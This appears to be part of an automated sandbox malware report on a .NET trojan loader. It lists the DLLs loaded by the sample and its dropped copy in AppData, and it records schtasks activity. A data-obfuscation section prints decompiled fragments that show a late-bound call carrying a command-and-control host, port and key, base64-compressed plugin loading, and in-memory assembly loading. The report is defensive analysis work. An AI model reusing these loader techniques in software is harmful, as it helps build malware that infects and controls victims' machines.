                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: avicap32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: msvfw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, lNjw1JhxSV5n0cCMNW.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                    .NET source code contains potential unpacker
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, Login.cs.Net Code: InitializeComponent
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, Messages.cs.Net Code: Memory
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, Messages.cs.Net Code: Memory
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, HE2n9dW4U1DsdVPZZK.cs.Net Code: WQUYEM92kf System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_056AB057 push 00000005h; retf 0_2_056AB0B8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_056AB0F7 push 00000005h; retf 0_2_056AB0B8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_0708D41E push esp; iretd 0_2_0708D421
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_070861B8 pushfd ; retf 0_2_070861BC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_071D87A8 push esp; retf 0_2_071D87A9
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_0758D41E push esp; iretd 10_2_0758D421
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_075861B8 pushfd ; retf 10_2_075861BC
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_07827F3B pushfd ; ret 10_2_07827F41
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_07827EF3 push esp; ret 10_2_07827EF9
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_078242D9 push ebx; ret 10_2_078242DA
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_07829003 push esp; iretd 10_2_07829009
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeCode function: 10_2_0782906B pushfd ; iretd 10_2_07829071
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeStatic PE information: section name: .text entropy: 7.717538065664358
                    Source: xNgpESfQOvfb.exe.0.drStatic PE information: section name: .text entropy: 7.717538065664358
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, lNjw1JhxSV5n0cCMNW.csHigh entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, NkEtj4xdihRGcDPjVY.csHigh entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpack, lNjw1JhxSV5n0cCMNW.csHigh entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
